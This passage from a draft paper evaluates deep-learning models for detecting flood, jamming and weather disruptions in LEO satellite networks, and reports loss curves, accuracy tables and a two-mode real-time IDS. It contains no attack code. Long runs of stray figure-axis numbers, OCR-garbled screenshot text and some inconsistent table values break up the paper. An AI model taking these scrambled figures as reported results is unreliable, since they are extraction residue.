+ /
1341
+ Loss function
1342
+ Negative Log Likelihood Loss
1343
+ /
1344
+ Optimizer algorithm
1345
+ Stochastic Gradient Descent
1346
+ Optimizer
1347
+ /
1348
+ A. Binary classification
1349
+ Fig.14
1350
+ shows
1351
+ the
1352
+ training
1353
+ loss
1354
+ and
1355
+ validation
1356
+ loss
1357
+ over
1358
+ time
1359
+ for
1360
+ binary
1361
+ classification
1362
+ of «SATCOM.LEO.NDBPO.#1», overall, there is always a sharp drop in the beginning epochs of
1363
+ learning for both losses in all models, this indicates that all the models perform very well during
1364
+ at the start, then the learning stops after about ten or twenty epochs, and this is either a sign of
1365
+ a local optimum trap, or that the best parameters were found. In addition, we observe that the
1366
+ RNN model starts overfitting on the training data since the training loss starts decreasing rapidly
1367
+ but validation loss maintain almost the same level, that is why this model performs the worst.
1368
+ The CNN model seems to have reached its peak after the first decade of epochs.
1369
+ Fig. 14: Training and validation loss for the binary classification on «SAT-COM.LEO.NDBPO.#1»
1370
+ Fig.15 illustrates the graphs for the «SATCOM.LEO.NDBPO.#2» dataset, it shows that almost all
1371
+ January 11, 2023
1372
+ DRAFT
1373
+
1374
+ 100
1375
+ 1.00
1376
+ 1
1377
+ Training loss
1378
+ 0.75
1379
+ 0.75
1380
+ Validation loss
1381
+ 0.50
1382
+ 0.50
1383
+ 0.25
1384
+ 0.25
1385
+ Loss
1386
+ 0.00
1387
+ CNN
1388
+ 0.00
1389
+ MLP
1390
+ 0.25
1391
+ 0.25
1392
+ 0.25
1393
+ 10
1394
+ 0.50
1395
+ 0.50
1396
+ Epoch
1397
+ 0.75
1398
+ 0.75
1399
+ 1.00
1400
+ 1.00
1401
+ 10
1402
+ 20
1403
+ 30
1404
+ 40
1405
+ 50
1406
+ 10
1407
+ 02
1408
+ 30
1409
+ 40
1410
+ 50
1411
+ 1.00
1412
+ 1.00
1413
+ 1.00
1414
+ 0.75
1415
+ 0.75
1416
+ 0.75
1417
+ 0.50
1418
+ 0.50
1419
+ 0.50
1420
+ 0.25
1421
+ 0.25
1422
+ 0.00
1423
+ RNN
1424
+ 0.00
1425
+ GRU
1426
+ 0.00
1427
+ LSTM
1428
+ 0.25
1429
+ 0.25
1430
+ 0.25
1431
+ 0.50
1432
+ 0.50
1433
+ 0.50
1434
+ 0.75
1435
+ 0.75
1436
+ 0.75
1437
+ 1.00
1438
+ 0
1439
+ 10
1440
+ 20
1441
+ OE
1442
+ 40
1443
+ 50
1444
+ 1.00
1445
+ 0
1446
+ 10
1447
+ 20
1448
+ OE
1449
+ 40
1450
+ 50
1451
+ 1.00
1452
+ 0
1453
+ 10
1454
+ 20
1455
+ 30
1456
+ 40
1457
+ 5022
1458
+ the models had similar performances after training, where GRU and LSTM had a better success in
1459
+ learning, while the other two algorithms RNN and MLP clearly show sign of overfitting after 500
1460
+ and 100 epochs, respectively.
1461
+ Fig. 15: Training and validation loss for the binary classification on «SAT-COM.LEO.NDBPO.#2»
1462
+ Tab.VI summarizes the final performance results of each model, the LSTM model appears to
1463
+ perform best with a false positive rate of 0.014% and a false negative rate of 0.008%. However,
1464
+ the CNN model also performs well, but with a false negative rate of 0% is not very optimal when
1465
+ the false positive rate is relatively large 0.2%, because the false positives themselves will be a
1466
+ new source of disturbance in the network. In addition, the training and execution times are very
1467
+ long which makes the model difficult to update, especially considering that the overall
1468
+ performance of this model is the least-performing one. For this reason, we eliminate CNN model
1469
+ from the detection experiments on the second dataset. Tab.VII represents the confusion table for
1470
+ binary detection.
1471
+ TABLE VI: Performance results for binary classification
1472
+ Dataset
1473
+ SAT-COM.LEO.NDBPO.#1
1474
+ SAT-COM.LEO.NDBPO.#2
1475
+ Algorithm
1476
+ MLP
1477
+ CNN
1478
+ RNN
1479
+ GRU
1480
+ LSTM
1481
+ MLP
1482
+ RNN
1483
+ GRU
1484
+ LSTM
1485
+ Accuracy
1486
+ 99.91%
1487
+ 99.85%
1488
+ 99.78%
1489
+ 99.83%
1490
+ 99.98%
1491
+ 95.35%
1492
+ 95.26%
1493
+ 96.12%
1494
+ 95.78%
1495
+ Precision
1496
+ 99.67%
1497
+ 99.46%
1498
+ 99.21%
1499
+ 99.4%
1500
+ 99.96%
1501
+ 93.52%
1502
+ 93.54%
1503
+ 93.39%
1504
+ 93.56%
1505
+ Recall
1506
+ 99.99%
1507
+ 100%
1508
+ 99.98%
1509
+ 99.99%
1510
+ 99.99%
1511
+ 93.86%
1512
+ 93.61%
1513
+ 96%
1514
+ 94.98%
1515
+ Sum of probabilities
1516
+ 99.91%
1517
+ 99.95%
1518
+ 99.84%
1519
+ 99.86%
1520
+ 99.92%
1521
+ 98.14%
1522
+ 98.61%
1523
+ 98.3%
1524
+ 98.26%
1525
+ Training time per epoch
1526
+ 381.5s
1527
+ 1474s
1528
+ 401.9s
1529
+ 382.3s
1530
+ 396.5s
1531
+ 40.5s
1532
+ 32.15s
1533
+ 82.33s
1534
+ 115.8s
1535
+ Execution time
1536
+ 67.85s
1537
+ 166.42s
1538
+ 136.45s
1539
+ 124s
1540
+ 134.39s
1541
+ 394.5s
1542
+ 136.45s
1543
+ 287.45s
1544
+ 272.65s
1545
+ DRAFT
1546
+ January 11, 2023
1547
+
1548
+ 1.00
1549
+ 1.00
1550
+ 0.75
1551
+ 0.75
1552
+ Training loss
1553
+ Validation loss
1554
+ 0.50
1555
+ 0.50
1556
+ 0.25
1557
+ 0.25
1558
+ 0.00
1559
+ RNN
1560
+ 0.00
1561
+ MLP
1562
+ Loss
1563
+ 0.25
1564
+ 0.25
1565
+ 0.25
1566
+ 0.50
1567
+ 0.50
1568
+ 10
1569
+ 0.75
1570
+ 0.75
1571
+ Epoch
1572
+ 1.00
1573
+ 0
1574
+ 100
1575
+ 200
1576
+ OOE
1577
+ 400
1578
+ 500
1579
+ 600
1580
+ 700
1581
+ 800
1582
+ 1.00
1583
+ 0
1584
+ 25
1585
+ 50
1586
+ 75
1587
+ 100
1588
+ 125
1589
+ 150
1590
+ 175
1591
+ 200
1592
+ 1.00
1593
+ 1.00
1594
+ 0.75
1595
+ 0.75
1596
+ 0.50
1597
+ 0.50
1598
+ 0.25
1599
+ 0.25
1600
+ 0.00
1601
+ GRU
1602
+ 0.00
1603
+ LSTM
1604
+ 0.25
1605
+ 0.25
1606
+ 0.50
1607
+ 0.50
1608
+ 0.75
1609
+ 0.75
1610
+ 1.00
1611
+ 1.00
1612
+ 0
1613
+ 25
1614
+ 0S
1615
+ 75
1616
+ 100
1617
+ 125
1618
+ 150
1619
+ 175
1620
+ 200
1621
+ 0
1622
+ 40
1623
+ 60
1624
+ 80
1625
+ 10023
1626
+ TABLE VII: Table de confusion - Classification binaire
1627
+ Algorithm
1628
+ MLP
1629
+ CNN
1630
+ RNN
1631
+ GRU
1632
+ LSTM
1633
+ Dataset
1634
+ Class
1635
+ Normal
1636
+ Attack
1637
+ Normal
1638
+ Attack
1639
+ Normal
1640
+ Attack
1641
+ Normal
1642
+ Attack
1643
+ Normal
1644
+ Attack
1645
+ D-Set#1
1646
+ Normal
1647
+ 99.87%
1648
+ 0.01%
1649
+ 99.79%
1650
+ 0%
1651
+ 99.69%
1652
+ 0.02%
1653
+ 99.76%
1654
+ 0.01%
1655
+ 99.985%
1656
+ 0.009%
1657
+ Attack
1658
+ 0.13%
1659
+ 99.99%
1660
+ 0.21%
1661
+ 100%
1662
+ 0.3%
1663
+ 99.98%
1664
+ 0.23%
1665
+ 99.99%
1666
+ 0.01%
1667
+ 99.99%
1668
+ D-Set#2
1669
+ Normal
1670
+ 96.35%
1671
+ 6.54%
1672
+ /
1673
+ /
1674
+ 96.36%
1675
+ 6.82%
1676
+ 96.27%
1677
+ 4.17%
1678
+ 96.35%
1679
+ 5.26%
1680
+ Attack
1681
+ 3.65%
1682
+ 93.46%
1683
+ /
1684
+ /
1685
+ 3.64%
1686
+ 93.18%
1687
+ 3.73%
1688
+ 95.83%
1689
+ 3.65%
1690
+ 94.71%
1691
+ B. Multi-class classification
1692
+ Fig.16 represents the loss graph for the dataset «SAT-COM.LEO.NDBPO.#1» in multiclass
1693
+ classification. The CNN graph looks very unstable, inconsistent and doesn’t converge smoothly.
1694
+ In spite of that, RNN and LSTM reach their peak since both graphs remain steady after few
1695
+ epochs. On the other hand MLP and GRU seem to perform well and can even continue learning
1696
+ if granted more training epochs.
1697
+ Fig. 16: Training and validation loss for the multiclass classification on «SAT-COM.LEO.NDBPO.#1»
1698
+ Fig.17 shows results for «SAT-COM.LEO.NDBPO.#2», we can see that there is no over-fitting for
1699
+ all models, we also observe that the decrease in the losses is smoother until they stabilize when
1700
+ the models reach their peaks.
1701
+ Tab.VIII summarizes the final performance of each model for the multiclass classification. MLP
1702
+ outperforms other algorithms with a false positives rate of 0.02% and a false negatives rate of 0.02%
1703
+ as well. RNN had a false positives rate and false negatives of 0% since all false classifications were
1704
+ classified as udp flood attack. The CNN confirms that it does not adapt well to the detection
1705
+ of interruptions in the networks. The table shows for the second dataset, that MLP performs
1706
+ January 11, 2023
1707
+ DRAFT
1708
+
1709
+ 1.00
1710
+ 1.00
1711
+ 1
1712
+ Training loss
1713
+ 0.75
1714
+ 0.75
1715
+ Validation loss
1716
+ 0.50
1717
+ 0.50
1718
+ 0.25
1719
+ 0.25
1720
+ 0.00
1721
+ CNN
1722
+ 0.00
1723
+ MLP
1724
+ Loss
1725
+ 0.25
1726
+ 0.25
1727
+ 0.25
1728
+ 0.50
1729
+ 0.50
1730
+ 10
1731
+ Epoch
1732
+ 0.75
1733
+ 0.75
1734
+ 1.00
1735
+ 1.00
1736
+ 0
1737
+ 10
1738
+ 20
1739
+ 30
1740
+ 40
1741
+ 50
1742
+ 10
1743
+ 20
1744
+ OE
1745
+ 40
1746
+ 50
1747
+ 1.00
1748
+ 1.00
1749
+ 1.00
1750
+ 0.75
1751
+ 0.75
1752
+ 0.75
1753
+ 0.50
1754
+ 0.50
1755
+ 0.50
1756
+ 0.25
1757
+ 0.25
1758
+ 0.25
1759
+ 0.00
1760
+ RNN
1761
+ 0.00
1762
+ GRU
1763
+ 0.00
1764
+ LSTM
1765
+ 0.25
1766
+ 0.25
1767
+ 0.25
1768
+ 0.50
1769
+ 0.50
1770
+ 0.50
1771
+ 0.75
1772
+ 0.75
1773
+ 0.75
1774
+ 1.00
1775
+ 10
1776
+ 20
1777
+ 30
1778
+ 50
1779
+ 1.00
1780
+ 0
1781
+ 10
1782
+ 20
1783
+ 30
1784
+ 40
1785
+ 50
1786
+ 1.00
1787
+ 0
1788
+ 10
1789
+ 20
1790
+ 30
1791
+ 40
1792
+ 50 24
1793
+ Fig. 17: Training and validation loss for the multiclass classification on «SAT-COM.LEO.NDBPO.#2»
1794
+ better, mainly due to the relatively low false positives rate. The performance shown in Table 4.11
1795
+ indicates that MLP performs better, mainly due to the relatively low false positive rate (12,25 %)
1796
+ TABLE VIII: Performance results for multiclass classification
1797
+ Dataset
1798
+ SAT-COM.LEO.NDBPO.#1
1799
+ SAT-COM.LEO.NDBPO.#2
1800
+ Algorithm
1801
+ MLP
1802
+ CNN
1803
+ RNN
1804
+ GRU
1805
+ LSTM
1806
+ MLP
1807
+ RNN
1808
+ GRU
1809
+ LSTM
1810
+ Accuracy
1811
+ 99.33%
1812
+ 97.32%
1813
+ 96.02%
1814
+ 98.69%
1815
+ 98.72%
1816
+ 90.94%
1817
+ 94.35%
1818
+ 94.35%
1819
+ 94.35%
1820
+ Precision
1821
+ 99.98%
1822
+ 99.9%
1823
+ 100%
1824
+ 99.84%
1825
+ 99.59%
1826
+ 87.75%
1827
+ 85.94%
1828
+ 85.94%
1829
+ 85.94%
1830
+ Recall
1831
+ 99.98%
1832
+ 99.9%
1833
+ 100%
1834
+ 100%
1835
+ 99.99%
1836
+ 71.39%
1837
+ 100%
1838
+ 100%
1839
+ 100%
1840
+ Sum of probabilities
1841
+ 99.7%
1842
+ 99.07%
1843
+ 99.94%
1844
+ 99.82%
1845
+ 99.65%
1846
+ 99.66%
1847
+ 99.48%
1848
+ 99.55%
1849
+ 99.12%
1850
+ Training time per epoch
1851
+ 404.54s
1852
+ 1770.6s
1853
+ 367.32s
1854
+ 382.69s
1855
+ 414.62s
1856
+ 31.77s
1857
+ 26.89s
1858
+ 77.18s
1859
+ 119.93s
1860
+ Execution time
1861
+ 104.88s
1862
+ 157.95s
1863
+ 130.29s
1864
+ 129.72s
1865
+ 138.55s
1866
+ 414.95s
1867
+ 238.18s
1868
+ 276.46s
1869
+ 372.82s
1870
+ From Tab.IX, we can deduce that the most efficient models to minimize the false positives rate
1871
+ are MLP and GRU with the optimizer algorithm «Adam». More precisely MLP is ideal for the
1872
+ detection of «DDoS UDP» attacks despite the low detection rate which is 83 %, because detecting
1873
+ certain attack packets is sufficient to detect malicious communications. On the other hand, the
1874
+ GRU is more efficient at detecting jamming attacks because less false positives are classified with
1875
+ Jamming attack category.
1876
+ DRAFT
1877
+ January 11, 2023
1878
+
1879
+ 1.00
1880
+ 1.00
1881
+ 0.75
1882
+ 0.75
1883
+ Training loss
1884
+ 0S'0
1885
+ 0.50
1886
+ Validation loss
1887
+ 0.25
1888
+ 0.25
1889
+ 0.00
1890
+ RNN
1891
+ 0.00
1892
+ MLP
1893
+ Loss
1894
+ 0.25
1895
+ 0.25
1896
+ 0.25
1897
+ 0.50
1898
+ 0.50
1899
+ 10
1900
+ 0.75
1901
+ 0.75
1902
+ Epoch
1903
+ 1.00
1904
+ 0
1905
+ 25
1906
+ 05
1907
+ 75
1908
+ 100
1909
+ 125
1910
+ 150
1911
+ 175
1912
+ 00Z
1913
+ 1.00
1914
+ n
1915
+ 25
1916
+ 50
1917
+ 100
1918
+ 125
1919
+ 150
1920
+ 175
1921
+ 200
1922
+ 1.00
1923
+ 1.00
1924
+ 0.75
1925
+ 0.75
1926
+ 0.50
1927
+ 0.50
1928
+ 0.25
1929
+ 0.25
1930
+ 0.00
1931
+ GRU
1932
+ 00'0
1933
+ LSTM
1934
+ 0.25
1935
+ 0.25
1936
+ 0.50
1937
+ 0.50
1938
+ 0.75
1939
+ 0.75
1940
+ 1.00
1941
+ 0
1942
+ 25
1943
+ 50
1944
+ 75
1945
+ 100
1946
+ 125
1947
+ 150
1948
+ 175
1949
+ 200
1950
+ 1.00
1951
+ 25
1952
+ 50
1953
+ 75
1954
+ 100
1955
+ 125
1956
+ 150
1957
+ 175
1958
+ 20025
1959
+ TABLE IX: Confusion table - Classification multiclass
1960
+ Algorithm
1961
+ MLP
1962
+ RNN
1963
+ Dataset
1964
+ Class
1965
+ Normal
1966
+ UDP
1967
+ Flood
1968
+ Rain
1969
+ Thunder
1970
+ Jamming
1971
+ Normal
1972
+ UDP
1973
+ Flood
1974
+ Rain
1975
+ Thunder
1976
+ Jamming
1977
+ Dataset#1
1978
+ Normal
1979
+ 98.82%
1980
+ 0.02%
1981
+ 0%
1982
+ 0%
1983
+ 92.95%
1984
+ 0%
1985
+ 0%
1986
+ 0%
1987
+ UDP
1988
+ Flood
1989
+ 0%
1990
+ 99.98%
1991
+ 0%
1992
+ 0%
1993
+ 0%
1994
+ 100%
1995
+ 0%
1996
+ 0%
1997
+ Rain
1998
+ Thunder
1999
+ 1.16%
2000
+ 0%
2001
+ 100%
2002
+ 0%
2003
+ 7.05%
2004
+ 0%
2005
+ 100%
2006
+ 0%
2007
+ Jamming
2008
+ 0.0099%
2009
+ 0%
2010
+ 0%
2011
+ 100%
2012
+ 0%
2013
+ 0%
2014
+ 0%
2015
+ 100%
2016
+ Dataset#2
2017
+ Normal
2018
+ 93.7%
2019
+ 93.7%
2020
+ 0%
2021
+ 0%
2022
+ 89.659%
2023
+ 0%
2024
+ 0%
2025
+ 0%
2026
+ UDP
2027
+ Flood
2028
+ 0.0006%
2029
+ 83.54%
2030
+ 0%
2031
+ 0.0065%
2032
+ 4.0913%
2033
+ 100%
2034
+ 0%
2035
+ 0%
2036
+ Rain
2037
+ Thunder
2038
+ 0%
2039
+ 0%
2040
+ 100%
2041
+ 0%
2042
+ 0%
2043
+ 0%
2044
+ 100%
2045
+ 0%
2046
+ Jamming
2047
+ 6.294%
2048
+ 0%
2049
+ 0%
2050
+ 99.993%
2051
+ 6.2494%
2052
+ 0%
2053
+ 0%
2054
+ 100%
2055
+ Algorithm
2056
+ GRU
2057
+ LSTM
2058
+ Dataset
2059
+ Class
2060
+ Normal
2061
+ UDP
2062
+ Flood
2063
+ Rain
2064
+ Thunder
2065
+ Jamming
2066
+ Normal
2067
+ UDP
2068
+ Flood
2069
+ Rain
2070
+ Thunder
2071
+ Jamming
2072
+ Dataset#1
2073
+ Normal
2074
+ 97.68%
2075
+ 0%
2076
+ 0%
2077
+ 0%
2078
+ 97.73%
2079
+ 0.0084%
2080
+ 0.022%
2081
+ 0%
2082
+ UDP
2083
+ Flood
2084
+ 0.033%
2085
+ 100%
2086
+ 0%
2087
+ 0%
2088
+ 0%
2089
+ 99.99%
2090
+ 0%
2091
+ 0%
2092
+ Rain
2093
+ Thunder
2094
+ 2.24%
2095
+ 0%
2096
+ 100%
2097
+ 0%
2098
+ 2.065%
2099
+ 99.71%
2100
+ 99.98%
2101
+ 0%
2102
+ Jamming
2103
+ 0.043%
2104
+ 0%
2105
+ 0%
2106
+ 100%
2107
+ 0.2%
2108
+ 0%
2109
+ 0%
2110
+ 100%
2111
+ Dataset#2
2112
+ Normal
2113
+ 92.58%
2114
+ 0%
2115
+ 0%
2116
+ 1.142%
2117
+ 89.66%
2118
+ 0%
2119
+ 0%
2120
+ 0%
2121
+ UDP
2122
+ Flood
2123
+ 4.14%
2124
+ 100%
2125
+ 0%
2126
+ 0%
2127
+ 4.09%
2128
+ 100%
2129
+ 0%
2130
+ 0%
2131
+ Rain
2132
+ Thunder
2133
+ 0%
2134
+ 0%
2135
+ 100%
2136
+ 0%
2137
+ 0%
2138
+ 0%
2139
+ 100%
2140
+ 0%
2141
+ Jamming
2142
+ 3.441%
2143
+ 0%
2144
+ 0%
2145
+ 98.85%
2146
+ 6.2494%
2147
+ 0%
2148
+ 0%
2149
+ 100%
2150
+ January 11, 2023
2151
+ DRAFT
2152
+
2153
+ 26
2154
+ C. Realtime detection
2155
+ To perform the real-time detection, we programmed another sniffer that captures the traffic for
2156
+ a given period of time, and at the end of each period the sniffer executes a code that processes the
2157
+ captured packets, loads the models and launches the process of attack detection with the captured
2158
+ traffic. The discovery procedure is performed without interrupting the continuous capture of the
2159
+ network.
2160
+ We program a real-time IDS which operates in two modes.
2161
+ 1) Normal Mode: In this mode, we try to eliminate false positives completely at the price of losing
2162
+ some precision. i.e our IDS does not try to decide for each suspect packet if it is malicious or
2163
+ victim, but it only detects anomalies in a communication flow. 2) Safe mode: In this mode, the
2164
+ IDS detects as many suspicious packets as possible, and does not give as much importance to false
2165
+ positives as to false negatives. This model should be implemented passively, and it should never
2166
+ be a proactive system as it will alert on many false positives.
2167
+ For real-time simulation, we take the pcap file generated with Omnet++ and we reproduce the
2168
+ traffic using Tcpreplay. We also use the extracted information from the simulation on the SNIR
2169
+ and on the THROUGHPUT of the satellite during communication, since these two features are
2170
+ available and can be calculated in all wireless networks. The detection process does not differ too
2171
+ much from offline detection, a continuous discovery captures packets and processes them in very
2172
+ short periods of time. To minimize the false positive rate, the «Normal» mode detection is as
2173
+ follows:
2174
+ • UDP Flood: Throws alert if both of the following conditions are true:
2175
+ - 20% minimum of captured traffic is classified as a «flood» attack.
2176
+ - At least 70% of a captured flow is a «flood» class attack.
2177
+ • Natural Phenomenons: Throws alert if both of the following conditions are true:
2178
+ - A maximum of 10% of the captured traffic is classified as a «Rain and Thunderstorms» attack.
2179
+ - 20% of a captured stream is affected by «Natural interference».
2180
+ • Jammed traffic: Throws alert if both of the following conditions are true:
2181
+ - A maximum of 20% of captured traffic is classified as a «Network Jamming» attack.
2182
+ - 90% minimum of a captured traffic is affected by «Network Jamming».
2183
+ The IDS in action: In the following we show a comparison of detection in «Normal» mode and
2184
+ in «safe» mode for the three existing classes. The IDS is executed with a period of 30 seconds.
2185
+ The results for the first 2 minutes are as follows:
2186
+ DRAFT
2187
+ January 11, 2023
2188
+
2189
+ 27
2190
+ For benign traffic, the Normal mode do not trigger any alert for all the three attacks.
2191
+ Furthermore, in Safe mode no alert has been triggered for the Rain and Thunderstorms class,
2192
+ but on the other hand, for Jamming and UDP Flood class, several alerts are launched, the
2193
+ normal traffic classified as flood attack is on average between 2% and 6%, while for normal
2194
+ packets classified as victims of jamming attacks is between 21% and 28%. The results of
2195
+ detection in both modes for the malicious flood traffic shows that no packet is misclassified
2196
+ as a victim of natural interference, while a small flow composing 0.1% is miss-classified as a
2197
+ jamming victim, all malicious flows of flood attacks seem to be well classified. Fig.18 illustrates
2198
+ an example of the flood attacks detection in Normal mode.
2199
+ Fig. 18: Behavior of IDS in «Normal» mode against malicious ”UDP Flood”.
2200
+ For traffic affected by natural phenomena events, results in both modes are 100% accurate,
2201
+ although in Safe mode, 0.46% of a normal flow, that translates to about 0.04% of the total
2202
+ traffic captured, is falsely classified as affected. Same goes for the detection of jamming traffic in
2203
+ Normal mode, the malicious traffic is successfully detected, but on the other hand in Safe mode,
2204
+ two flows are detected and classified as UDP Flood and Rain and Thunderstorms with 12.69%
2205
+ and 67.42% of total flow of the two classes respectively, as presented is Fig.19.
2206
+ January 11, 2023
2207
+ DRAFT
2208
+
2209
+ reniflersur linterface
2210
+ ens33
2211
+ Jamming
2212
+ Detection entre
2213
+ 13:05:37et
2214
+ 13:06:07
2215
+ Attaque par Flood
2216
+ Flux entre 19.10.1.107
2217
+ et
2218
+ 19.1o.1.254 avec un pourcentagede 96.94%du flux
2219
+ 22.oo % du trafic capture
2220
+ Flux entre 19.1o.1.108 et
2221
+ 19.1o.1.254 avec un pourcentage de 84.27% duflux
2222
+ 19.72 % du traficcapture
2223
+ Flux entre 19.10.1.106 et
2224
+ 19.1o.1.254 avec unpourcentage de74.2o%duflux
2225
+ 16.58 % du traficcapture
2226
+ Detection entre : 13:o5:37 et
2227
+ 13:06:07 :Aucun utilisateur affecte"
2228
+ Brouillage naturel
2229
+ Jamming
2230
+ Detection entre : 13:06:37 et
2231
+ 13:07:07
2232
+ Detection entre :13:o6:37et
2233
+ 13:o7:o7:Aucun utilisateur affecte"
2234
+ Brouillage naturel
2235
+ Attague parFlood
2236
+ Flux entre 19.10.1.107
2237
+ et
2238
+ 19.10.1.254 avec un pourcentage de100.00% du flux
2239
+ 22.67
2240
+ % du traficcapture
2241
+ Flux entre19.10.1.106 et 19.10.1.254 avecun pourcentage de 100.00%duflux
2242
+ 22.43 % du traficcapture
2243
+ Flux entre 19.1o.1.1o8 et 19.10.1.254 avec un pourcentagede 1oo.0o% du flux
2244
+ 23.67 % du traficcapture
2245
+ Jamming
2246
+ Detection entre : 13:o7:37 et
2247
+ 13:08:07
2248
+ Flux entre 19.1o.1.1o1et19.11.16.1oo avecun pourcentage de 6.63% du flux(0.10 % du trafic capture)
2249
+ Detection entre : 13:07:37 et 13:08:07 :Aucun utilisateur affecte
2250
+ Brouillagenaturel28
2251
+ Fig. 19: Behavior of IDS in «Safe» against « Jamming » Attacks.
2252
+ VI. Conclusion and future work
2253
+ An interruption detection method is proposed for LEO satellite networks based on Deep
2254
+ Learning in this paper. We have studied the various vulnerabilities and risks that threaten the
2255
+ operation and fluidity of Satellite communications. This work focuses on disruption threats of
2256
+ different types, such as flood attacks, network jamming attacks and natural phenomena events
2257
+ (such as rains, thunderstorms and hurricanes). Several deep learning based interruption
2258
+ detection models are proposed on two of our own generated datasets, including models based on
2259
+ MLP, CNN, RNN, GRU and LSTM. We have also provided performance assessment for binary
2260
+ and
2261
+ multi-class
2262
+ classifications.
2263
+ The
2264
+ best
2265
+ recorded
2266
+ accuracy
2267
+ on
2268
+ the
2269
+ dataset
2270
+ SATCOM.LEO.NDBPO.#1 is 99.987% for binary traffic detection and 99.33% for multiclass
2271
+ traffic
2272
+ detection
2273
+ with
2274
+ a
2275
+ minimum
2276
+ false
2277
+ positive
2278
+ rate
2279
+ of
2280
+ 0.0144%.
2281
+ For
2282
+ the
2283
+ dataset
2284
+ SATCOM.LEO.NDBPO.#2, the best recorded accuracy is 96.12% for the detection in binary
2285
+ classification and 94.35% for multiclass classification with a minimum false positives rate of
2286
+ 3.72% using a hybrid model composed of MLP and GRU. Enhancing this hybrid model with
2287
+ some statistical constraints also improves detection results and decreases false positives rate to
2288
+ almost 0%, at the cost of losing some accuracy precision. In conclusion, the results shows that
2289
+ this approach is effective for both offline and online interruption attacks detection, based on
2290
+ accuracy rate, detection rate, and prediction speed. This helps to demonstrate that Deep
2291
+ Learning algorithms could very well improve the security of satellite networks, especially against
2292
+ DDoS attacks. As future work, and under better circumstances such as, more computing power
2293
+ and memory resources, this work can be continued by implementing the DTN (Delay/Disruption
2294
+ Tolerant Networking) protocol from NaSa [56]which, according to NaSa, is perhaps the future of
2295
+ satellite communication. This protocol is currently being tested and improved. Different deep
2296
+ learning methods can can have better accuracy rate by involving terrestrial satellite terminals in
2297
+ DRAFT
2298
+ January 11, 2023
2299
+
2300
+ Avertissement :
2301
+ Attaque par Flood (mode safe)
2302
+ Detection entre :17:39:10 et
2303
+ 17:4o:10 Flux entre 19.10o.1.101 et 19.11.19.10o avec un pourcentage de 12.69% du flux (1.8o % du trafic capture)
2304
+ Detection entre : 17:39:10 et
2305
+ 17:40:10
2306
+ Avertissement:
2307
+ Brouillage Naturel (mode safe)
2308
+ Detection entre :17:39:10 et
2309
+ 17:40:10 Flux entre 19.10.1.108 et 19.10.1.105 avec un pourcentage de 67.42% du flux( 9.57 % du trafic capture)
2310
+ Jamming
2311
+ Detection entre :17:39:10 et
2312
+ 17:40:10 Flux entre 19.10.1.101 et 19.11.19.100 avec un pourcentage de 100.00% du flux (14.19 % du trafic capture)
2313
+ Jamming
2314
+ Detection entre : 17:40:11 et
2315
+ 17:41:11 Flux entre 19.10.1.101 et 19.11.19.10o avec un pourcentage de 100.00% du flux
2316
+ (6.40 %dutrafic capture)
2317
+ Detection entre : 17:40:11 et
2318
+ 17:41:11 Flux entre 19.10.1.101 et 19.11.16.10o avec un pourcentage de 100.00% du flux
2319
+ (4.66%du traficcapture)
2320
+ Detection entre : 17:4o:11 et
2321
+ 17:41:11Fluxentre19.10.1.102 et 19.10.1.106 avec un pourcentage de100.00% duflux
2322
+ (4.24 %du traficcapture
2323
+ Detection entre :17:41:11 et
2324
+ 17:42:11:Aucune attaque"
2325
+ Flood (Inondation)
2326
+ Jamming
2327
+ Detection entre :17:41:11 et
2328
+ 17:42:11 Flux entre 19.10.1.1o1 et 19.11.19.1o0 avecun pourcentage de 1oo.0o%du flux
2329
+ (5.3o % dutraficcapture)
2330
+ Detection entre :17:41:11 et
2331
+ 17:42:11 Flux entre 19.1o.1.1o2 et 19.10.1.106 avec un pourcentagede 1oo.0o% du flux
2332
+ (5.17%du trafic capture)
2333
+ Detection entre
2334
+ 17:41:11 et
2335
+ 17:42:11 Flux entre
2336
+ 19.10.1.101
2337
+ 19.11.16.1oo avec un pourcentage de 1oo.oo% du flux
2338
+ 5.44 % du trafic capture29
2339
+ the detection process, such as FL (Federated learning) [57] to protect users privacy and enable
2340
+ their contributions to learning, combined with DAEs and other promising models such as
2341
+ Bi-LSTM to speed up turnaround time.
2342
+ References
2343
+ [1] Components of a Satellite, by Space Foundation Editorial Team, https://spacefoundation.or
2344
+ g/wp-content/uploads/2019/10/SpaceFoundation Space101.pdf
2345
+ [2] Yoon, Eun-Jun & Kee-Young, Yoo & Hong, Jeong-Woo & Yoon, Sang-Yoon & Park, Dong-
2346
+ In & Choi, Myung-Jin. (2011). An efficient and secure anonymous authentication scheme for
2347
+ mobile satellite communication systems. EURASIP Journal on Wireless Communications and
2348
+ Networking. 2011. 10.1186/1687-1499-2011-86.
2349
+ [3] Songjie Wei, Shuai Li, Peilong Liu, Meilin Liu, ”BAVP: Blockchain-Based Access Verification
2350
+ Protocol in LEO Constellation Using IBE Keys”, Security and Communication Networks, vol.
2351
+ 2018, Article ID 7202806, 14 pages, 2018. https://doi.org/10.1155/2018/7202806
2352
+ [4] I. Altaf, M. A. Saleem, K. Mahmood, S. Kumari, P. Chaudhary and C. -M. Chen,
2353
+ ”A Lightweight Key Agreement and Authentication Scheme for Satellite-Communication
2354
+ Systems,” in IEEE Access, vol. 8, pp. 46278-46287, 2020, doi: 10.1109/ACCESS.2020.2978314.
2355
+ [5] Qi, Mingping & Chen, Jianhua. (2017). An enhanced authentication with key agreement
2356
+ scheme for satellite communication systems. International Journal of Satellite Communications
2357
+ and Networking. 36. 10.1002/sat.1218.
2358
+ [6] Congyu Huang, Zijian Zhang, Meng Li, Liehuang Zhu, Zhengjia Zhu & Xiaoxian Yang
2359
+ (2020) A mutual authentication and key update protocol in satellite communication network,
2360
+ Automatika, 61:3, 334-344, DOI: 10.1080/00051144.2020.1757966
2361
+ [7] J. Hu, J. Shi, S. Ma and Z. Li, ”Secrecy Analysis for Orthogonal Time Frequency Space Scheme
2362
+ Based Uplink LEO Satellite Communication,” in IEEE Wireless Communications Letters, vol.
2363
+ 10, no. 8, pp. 1623-1627, Aug. 2021, doi: 10.1109/LWC.2021.3072902.
2364
+ [8] Zhenyu Na, Zheng Pan, Xin Liu, Zhian Deng, Zihe Gao, Qing Guo, ”Distributed Routing
2365
+ Strategy Based on Machine Learning for LEO Satellite Network”, Wireless Communications
2366
+ and Mobile Computing, vol. 2018, Article ID 3026405, 10 pages, 2018. https://doi.org/10.115
2367
+ 5/2018/3026405
2368
+ [9] J. P. Mart´ın, B. Marengo, J. P. Prina and M. G. Riolfo, ”MESSAGE COLLISION
2369
+ IDENTIFICATION APPROACH USING MACHINE LEARNING,” 2018 ITU Kaleidoscope:
2370
+ January 11, 2023
2371
+ DRAFT
